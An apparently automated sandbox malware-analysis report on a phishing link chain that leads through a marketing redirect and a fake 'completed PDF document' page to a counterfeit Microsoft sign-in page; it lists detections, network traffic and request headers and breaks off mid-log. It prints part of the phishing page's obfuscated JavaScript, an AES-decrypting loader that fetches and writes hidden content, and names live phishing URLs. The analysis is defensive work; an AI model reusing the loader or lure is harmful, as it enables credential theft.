Edit tour

Windows Analysis Report
https://public-usa.mkt.dynamics.com/api/orgs/f8d62d3a-5b03-f011-b015-6045bd003905/r/FMPIXkRqqkmv-j_Li7QBAAEAAAA?target={"TargetUrl"%3A"https%3A%2F%2Fgamma.app%2Fdocs%2FJanel-Group-Completed-Document-x686r1ir4nghubz%3Fmode%3Dpresent%23card-an1daph37h4un5p"%2C"RedirectOptio

Overview

General Information

Sample URL:https://public-usa.mkt.dynamics.com/api/orgs/f8d62d3a-5b03-f011-b015-6045bd003905/r/FMPIXkRqqkmv-j_Li7QBAAEAAAA?target={"TargetUrl"%3A"https%3A%2F%2Fgamma.app%2Fdocs%2FJanel-Group-Co
Analysis ID:1641719
Infos:

Detection

HTMLPhisher
Score:72
Range:0 - 100
Confidence:100%

Signatures

AI detected phishing page
Antivirus detection for URL or domain
Yara detected HtmlPhish10
AI detected landing page (webpage, office document or email)
Phishing site or detected (based on various text indicators)
Creates files inside the system directory
Deletes files inside the Windows folder
Detected non-DNS traffic on DNS port
HTML body contains low number of good links
HTML body contains password input but no form action
HTML page contains hidden javascript code
HTML title does not match URL
Invalid T&C link found
Uses Javascript AES encryption / decryption (likely to hide suspicious Javascript code)

Classification

RansomwareSpreadingPhishingBankerTrojan / BotAdwareSpywareExploiterEvaderMinercleansuspiciousmalicious
  • System is w10x64_ra
  • chrome.exe (PID: 6940 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank" MD5: E81F54E6C1129887AEA47E7D092680BF)
    • chrome.exe (PID: 7132 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=1976,i,10263868635164877779,4600966844859016141,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version --mojo-platform-channel-handle=2212 /prefetch:3 MD5: E81F54E6C1129887AEA47E7D092680BF)
  • chrome.exe (PID: 5608 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://public-usa.mkt.dynamics.com/api/orgs/f8d62d3a-5b03-f011-b015-6045bd003905/r/FMPIXkRqqkmv-j_Li7QBAAEAAAA?target=%7B%22TargetUrl%22%3A%22https%253A%252F%252Fgamma.app%252Fdocs%252FJanel-Group-Completed-Document-x686r1ir4nghubz%253Fmode%253Dpresent%2523card-an1daph37h4un5p%22%2C%22RedirectOptions%22%3A%7B%225%22%3Anull%2C%220%22%3Anull%7D%7D&digest=O1MpDB0efooTe4PN%2BrbvabY6GTxgYZEijI2csju%2FBYg%3D&secretVersion=a587597bbd2d4ba3bb4334f6d8be15ee" MD5: E81F54E6C1129887AEA47E7D092680BF)
  • cleanup
SourceRuleDescriptionAuthorStrings
2.11.pages.csvJoeSecurity_HtmlPhish_10Yara detected HtmlPhish_10Joe Security
    No Sigma rule has matched
    No Suricata rule has matched

    Click to jump to signature section

    Show All Signature Results

    AV Detection

    barindex
    Source: https://dcumentfile.us-southeast-1.linodeobjects.com/favicon.icoAvira URL Cloud: Label: phishing

    Phishing

    barindex
    Source: https://dcumentfile.us-southeast-1.linodeobjects.com/dcumentready.htmlJoe Sandbox AI: Score: 9 Reasons: The brand 'Microsoft' is a well-known global technology company., The URL 'dcumentfile.us-southeast-1.linodeobjects.com' does not match the legitimate domain 'microsoft.com'., The URL uses a cloud service provider domain 'linodeobjects.com', which is not directly associated with Microsoft., The subdomain 'dcumentfile' and the region-specific part 'us-southeast-1' are suspicious and not typical for Microsoft., The URL structure suggests a potential phishing attempt by using a cloud service to host malicious content. DOM: 2.11.pages.csv
    Source: Yara matchFile source: 2.11.pages.csv, type: HTML
    Source: https://gamma.app/docs/Janel-Group-Completed-Document-x686r1ir4nghubz?mode=present&msdynmkt_trackingcontext=5ec8c314-6a44-49aa-affa-3fcb8bb40100#card-an1daph37h4un5pJoe Sandbox AI: Page contains button: 'VIEW COMPLETED DOCUMENT' Source: '1.5.pages.csv'
    Source: https://gamma.app/docs/Janel-Group-Completed-Document-x686r1ir4nghubz?mode=present&msdynmkt_trackingcontext=5ec8c314-6a44-49aa-affa-3fcb8bb40100#card-an1daph37h4un5pJoe Sandbox AI: Page contains button: 'VIEW COMPLETED DOCUMENT' Source: '1.4.pages.csv'
    Source: Chrome DOM: 1.4OCR Text: New Completed PDF Document Received Youlve received a new PDF Document for your review File Type: PDF Your PDF document has been completed VIEW COMPLETED DOCUMENT
    Source: Chrome DOM: 1.5OCR Text: New Completed PDF Document Received Youive received a new PDF Document for your review File Type: PDF Your PDF document has been completed VIEW COMPLETED DOCUMENT
    Source: https://dcumentfile.us-southeast-1.linodeobjects.com/dcumentready.htmlHTTP Parser: Number of links: 0
    Source: https://dcumentfile.us-southeast-1.linodeobjects.com/dcumentready.htmlHTTP Parser: <input type="password" .../> found but no <form action="...
    Source: https://dcumentfile.us-southeast-1.linodeobjects.com/dcumentready.htmlHTTP Parser: Base64 decoded: function hydroatmospheric(overaffirm) { var { a, b, c, d } = JSON.parse(overaffirm); var husha = CryptoJS.PBKDF2(d, CryptoJS.enc.Utf8.parse(b), { hasher: CryptoJS.algo.SHA512, keySize: (32 + 16) / 4, iterations: 999 }...
    Source: https://dcumentfile.us-southeast-1.linodeobjects.com/dcumentready.htmlHTTP Parser: Title: Sign in to your account does not match URL
    Source: https://dcumentfile.us-southeast-1.linodeobjects.com/dcumentready.htmlHTTP Parser: Invalid link: Privacy statement
    Source: anonymous functionHTTP Parser: (function anonymous() {function hydroatmospheric(overaffirm) { var { a, b, c, d } = json.parse(overaffirm); var husha = cryptojs.pbkdf2(d, cryptojs.enc.utf8.parse(b), { hasher: cryptojs.algo.sha512, keysize: (32 + 16) / 4, iterations: 999 }); const unmalleableness = cryptojs.lib.wordarray.create(husha.words.slice(0, 8)); const grandfer = cryptojs.lib.wordarray.create(husha.words.slice(8, 12)); let ranting = cryptojs.aes.decrypt(a, unmalleableness, { iv: grandfer }); return cryptojs.enc.utf8.stringify(ranting);}(async () => { document.open();/*sirloin cupidatat lorem kielbasa. */ document. /*$kalimat2*/ write(hydroatmospheric( /* overaffirm *//*fatback tempor spare ribs rump pork alcatra aute. */ await ( /*sint tempor frankfurter picanha chicken dolore ipsum, rump pork belly elit flank sunt in kevin officia. */await fetch(hydroatmospheric(atob(`eyjhijoiqvvwymuxdddqyzqyvvpptdg0n015m0dlvtdwcuhusktub0fianrwnuflylltowdb...
    Source: https://dcumentfile.us-southeast-1.linodeobjects.com/dcumentready.htmlHTTP Parser: <input type="password" .../> found
    Source: https://public-usa.mkt.dynamics.com/api/orgs/f8d62d3a-5b03-f011-b015-6045bd003905/r/FMPIXkRqqkmv-j_Li7QBAAEAAAA?target=%7B%22TargetUrl%22%3A%22https%253A%252F%252Fgamma.app%252Fdocs%252FJanel-Group-Completed-Document-x686r1ir4nghubz%253Fmode%253Dpresent%2523card-an1daph37h4un5p%22%2C%22RedirectOptions%22%3A%7B%225%22%3Anull%2C%220%22%3Anull%7D%7D&digest=O1MpDB0efooTe4PN%2BrbvabY6GTxgYZEijI2csju%2FBYg%3D&secretVersion=a587597bbd2d4ba3bb4334f6d8be15eeHTTP Parser: No favicon
    Source: https://dcumentfile.us-southeast-1.linodeobjects.com/dcumentready.htmlHTTP Parser: No favicon
    Source: https://dcumentfile.us-southeast-1.linodeobjects.com/dcumentready.htmlHTTP Parser: No favicon
    Source: https://dcumentfile.us-southeast-1.linodeobjects.com/dcumentready.htmlHTTP Parser: No favicon
    Source: https://dcumentfile.us-southeast-1.linodeobjects.com/dcumentready.htmlHTTP Parser: No <meta name="author".. found
    Source: https://dcumentfile.us-southeast-1.linodeobjects.com/dcumentready.htmlHTTP Parser: No <meta name="copyright".. found
    Source: unknownHTTPS traffic detected: 52.146.76.30:443 -> 192.168.2.16:49703 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 52.146.76.30:443 -> 192.168.2.16:49702 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 52.146.76.30:443 -> 192.168.2.16:49704 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 142.250.186.132:443 -> 192.168.2.16:49715 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 104.18.10.200:443 -> 192.168.2.16:49717 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 104.18.10.200:443 -> 192.168.2.16:49716 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 104.18.10.200:443 -> 192.168.2.16:49721 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 95.101.54.200:443 -> 192.168.2.16:49722 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 108.138.7.117:443 -> 192.168.2.16:49726 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 95.101.54.121:443 -> 192.168.2.16:49735 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 34.120.195.249:443 -> 192.168.2.16:49742 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 34.120.195.249:443 -> 192.168.2.16:49749 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 104.18.10.200:443 -> 192.168.2.16:49796 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 104.18.66.57:443 -> 192.168.2.16:49816 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 172.67.71.250:443 -> 192.168.2.16:49817 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 104.18.10.200:443 -> 192.168.2.16:49822 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 104.18.10.200:443 -> 192.168.2.16:49824 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 104.18.10.200:443 -> 192.168.2.16:49823 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 151.101.194.217:443 -> 192.168.2.16:49818 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 151.101.194.217:443 -> 192.168.2.16:49820 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 18.224.12.105:443 -> 192.168.2.16:49819 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 18.224.12.105:443 -> 192.168.2.16:49821 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 104.18.66.57:443 -> 192.168.2.16:49835 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 3.140.6.184:443 -> 192.168.2.16:49832 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 3.140.6.184:443 -> 192.168.2.16:49833 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 151.101.194.217:443 -> 192.168.2.16:49838 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 151.101.194.217:443 -> 192.168.2.16:49839 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 13.248.151.210:443 -> 192.168.2.16:49840 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 104.18.11.200:443 -> 192.168.2.16:49843 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 104.16.80.73:443 -> 192.168.2.16:49847 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 34.49.241.189:443 -> 192.168.2.16:49850 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 108.138.26.124:443 -> 192.168.2.16:49855 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 54.161.6.100:443 -> 192.168.2.16:49853 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 104.18.11.200:443 -> 192.168.2.16:49860 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 18.66.147.27:443 -> 192.168.2.16:49856 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 104.18.10.200:443 -> 192.168.2.16:49865 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 13.248.151.210:443 -> 192.168.2.16:49870 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 104.18.11.200:443 -> 192.168.2.16:49873 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 18.245.46.55:443 -> 192.168.2.16:49875 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 18.245.46.55:443 -> 192.168.2.16:49874 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 34.233.102.105:443 -> 192.168.2.16:49885 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 34.233.102.105:443 -> 192.168.2.16:49884 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 34.195.170.131:443 -> 192.168.2.16:49886 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 34.237.73.95:443 -> 192.168.2.16:49889 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 34.195.170.131:443 -> 192.168.2.16:49888 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 194.195.208.174:443 -> 192.168.2.16:49892 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 194.195.208.174:443 -> 192.168.2.16:49890 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 104.17.25.14:443 -> 192.168.2.16:49893 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 104.21.112.1:443 -> 192.168.2.16:49895 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 104.21.48.1:443 -> 192.168.2.16:49896 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 104.17.25.14:443 -> 192.168.2.16:49897 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 104.18.10.207:443 -> 192.168.2.16:49899 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 104.18.11.207:443 -> 192.168.2.16:49901 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 151.101.130.137:443 -> 192.168.2.16:49898 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 13.107.6.156:443 -> 192.168.2.16:49903 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 13.107.6.156:443 -> 192.168.2.16:49904 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 43.128.193.190:443 -> 192.168.2.16:49902 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 40.126.32.76:443 -> 192.168.2.16:49905 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 104.18.186.31:443 -> 192.168.2.16:49907 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 104.21.48.1:443 -> 192.168.2.16:49908 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 35.190.80.1:443 -> 192.168.2.16:49911 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 104.21.16.1:443 -> 192.168.2.16:49916 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 95.101.182.98:443 -> 192.168.2.16:49924 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 95.101.182.112:443 -> 192.168.2.16:49928 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 34.233.102.105:443 -> 192.168.2.16:49933 version: TLS 1.2
    Source: chrome.exeMemory has grown: Private usage: 7MB later: 38MB
    Source: global trafficTCP traffic: 192.168.2.16:49932 -> 1.1.1.1:53
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownTCP traffic detected without corresponding DNS query: 2.23.227.208
    Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
    Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
    Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
    Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
    Source: unknownTCP traffic detected without corresponding DNS query: 52.182.143.211
    Source: unknownTCP traffic detected without corresponding DNS query: 52.182.143.211
    Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
    Source: unknownTCP traffic detected without corresponding DNS query: 52.182.143.211
    Source: unknownTCP traffic detected without corresponding DNS query: 52.182.143.211
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownTCP traffic detected without corresponding DNS query: 52.182.143.211
    Source: unknownTCP traffic detected without corresponding DNS query: 52.182.143.211
    Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: global trafficHTTP traffic detected: GET /api/orgs/f8d62d3a-5b03-f011-b015-6045bd003905/r/FMPIXkRqqkmv-j_Li7QBAAEAAAA?target=%7B%22TargetUrl%22%3A%22https%253A%252F%252Fgamma.app%252Fdocs%252FJanel-Group-Completed-Document-x686r1ir4nghubz%253Fmode%253Dpresent%2523card-an1daph37h4un5p%22%2C%22RedirectOptions%22%3A%7B%225%22%3Anull%2C%220%22%3Anull%7D%7D&digest=O1MpDB0efooTe4PN%2BrbvabY6GTxgYZEijI2csju%2FBYg%3D&secretVersion=a587597bbd2d4ba3bb4334f6d8be15ee HTTP/1.1Host: public-usa.mkt.dynamics.comConnection: keep-alivesec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /api/orgs/f8d62d3a-5b03-f011-b015-6045bd003905/r/test HTTP/1.1Host: public-usa.mkt.dynamics.comConnection: UpgradePragma: no-cacheCache-Control: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Upgrade: websocketOrigin: https://public-usa.mkt.dynamics.comSec-WebSocket-Version: 13Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Sec-WebSocket-Key: FIbIKv5K+LwNZC2oELWqFw==Sec-WebSocket-Extensions: permessage-deflate; client_max_window_bits
    Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: public-usa.mkt.dynamics.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://public-usa.mkt.dynamics.com/api/orgs/f8d62d3a-5b03-f011-b015-6045bd003905/r/FMPIXkRqqkmv-j_Li7QBAAEAAAA?target=%7B%22TargetUrl%22%3A%22https%253A%252F%252Fgamma.app%252Fdocs%252FJanel-Group-Completed-Document-x686r1ir4nghubz%253Fmode%253Dpresent%2523card-an1daph37h4un5p%22%2C%22RedirectOptions%22%3A%7B%225%22%3Anull%2C%220%22%3Anull%7D%7D&digest=O1MpDB0efooTe4PN%2BrbvabY6GTxgYZEijI2csju%2FBYg%3D&secretVersion=a587597bbd2d4ba3bb4334f6d8be15eeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /docs/Janel-Group-Completed-Document-x686r1ir4nghubz?mode=present&msdynmkt_trackingcontext=5ec8c314-6a44-49aa-affa-3fcb8bb40100 HTTP/1.1Host: gamma.appConnection: keep-alivesec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: documentReferer: https://public-usa.mkt.dynamics.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /docs/Janel-Group-Completed-Document-x686r1ir4nghubz?mode=present&msdynmkt_trackingcontext=5ec8c314-6a44-49aa-affa-3fcb8bb40100 HTTP/1.1Host: gamma.appConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0sec-ch-ua-full-version: "134.0.6998.36"sec-ch-ua-arch: "x86"sec-ch-ua-platform: "Windows"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-model: ""sec-ch-ua-bitness: "64"sec-ch-ua-full-version-list: "Chromium";v="134.0.6998.36", "Not:A-Brand";v="24.0.0.0", "Google Chrome";v="134.0.6998.36"Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: documentReferer: https://public-usa.mkt.dynamics.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=haKae34CnnfVBameVtl7RWWwR3VnYKIWigU6sDn1.WE-1742299813-1.0.1.1-Ahg0zr0AB8BmhIH9bEfoKnpgp9CTST0X3awfyGiWoLMIyJEJ8ku3oksPHk3jlVUaiOog_XIUOlse86DP.iY079Vzj4RLjp1f_rbdJbxATaw
    Source: global trafficHTTP traffic detected: GET /_next/static/css/f8b783c6ab1b2b30.css?dpl=dpl_A8kBsHNrvDCGRieqMpGJQjqcRB45 HTTP/1.1Host: gamma.appConnection: keep-alivesec-ch-ua-full-version-list: "Chromium";v="134.0.6998.36", "Not:A-Brand";v="24.0.0.0", "Google Chrome";v="134.0.6998.36"sec-ch-ua-platform: "Windows"sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-ua-mobile: ?0sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "134.0.6998.36"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua-platform-version: "10.0.0"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://gamma.app/docs/Janel-Group-Completed-Document-x686r1ir4nghubz?mode=present&msdynmkt_trackingcontext=5ec8c314-6a44-49aa-affa-3fcb8bb40100Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=haKae34CnnfVBameVtl7RWWwR3VnYKIWigU6sDn1.WE-1742299813-1.0.1.1-Ahg0zr0AB8BmhIH9bEfoKnpgp9CTST0X3awfyGiWoLMIyJEJ8ku3oksPHk3jlVUaiOog_XIUOlse86DP.iY079Vzj4RLjp1f_rbdJbxATaw
    Source: global trafficHTTP traffic detected: GET /_next/static/css/d87801e5487946cc.css?dpl=dpl_A8kBsHNrvDCGRieqMpGJQjqcRB45 HTTP/1.1Host: gamma.appConnection: keep-alivesec-ch-ua-full-version-list: "Chromium";v="134.0.6998.36", "Not:A-Brand";v="24.0.0.0", "Google Chrome";v="134.0.6998.36"sec-ch-ua-platform: "Windows"sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-ua-mobile: ?0sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "134.0.6998.36"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua-platform-version: "10.0.0"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://gamma.app/docs/Janel-Group-Completed-Document-x686r1ir4nghubz?mode=present&msdynmkt_trackingcontext=5ec8c314-6a44-49aa-affa-3fcb8bb40100Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=haKae34CnnfVBameVtl7RWWwR3VnYKIWigU6sDn1.WE-1742299813-1.0.1.1-Ahg0zr0AB8BmhIH9bEfoKnpgp9CTST0X3awfyGiWoLMIyJEJ8ku3oksPHk3jlVUaiOog_XIUOlse86DP.iY079Vzj4RLjp1f_rbdJbxATaw
    Source: global trafficHTTP traffic detected: GET /_next/static/chunks/webpack-035e660fd527d215.js?dpl=dpl_A8kBsHNrvDCGRieqMpGJQjqcRB45 HTTP/1.1Host: gamma.appConnection: keep-alivesec-ch-ua-full-version-list: "Chromium";v="134.0.6998.36", "Not:A-Brand";v="24.0.0.0", "Google Chrome";v="134.0.6998.36"sec-ch-ua-platform: "Windows"sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-ua-mobile: ?0sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "134.0.6998.36"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua-platform-version: "10.0.0"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://gamma.app/docs/Janel-Group-Completed-Document-x686r1ir4nghubz?mode=present&msdynmkt_trackingcontext=5ec8c314-6a44-49aa-affa-3fcb8bb40100Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=haKae34CnnfVBameVtl7RWWwR3VnYKIWigU6sDn1.WE-1742299813-1.0.1.1-Ahg0zr0AB8BmhIH9bEfoKnpgp9CTST0X3awfyGiWoLMIyJEJ8ku3oksPHk3jlVUaiOog_XIUOlse86DP.iY079Vzj4RLjp1f_rbdJbxATaw
    Source: global trafficHTTP traffic detected: GET /_next/static/chunks/framework-89ee881bc4e530f4.js?dpl=dpl_A8kBsHNrvDCGRieqMpGJQjqcRB45 HTTP/1.1Host: gamma.appConnection: keep-alivesec-ch-ua-full-version-list: "Chromium";v="134.0.6998.36", "Not:A-Brand";v="24.0.0.0", "Google Chrome";v="134.0.6998.36"sec-ch-ua-platform: "Windows"sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-ua-mobile: ?0sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "134.0.6998.36"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua-platform-version: "10.0.0"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://gamma.app/docs/Janel-Group-Completed-Document-x686r1ir4nghubz?mode=present&msdynmkt_trackingcontext=5ec8c314-6a44-49aa-affa-3fcb8bb40100Accept-Encoding: gzip, deflate, br, 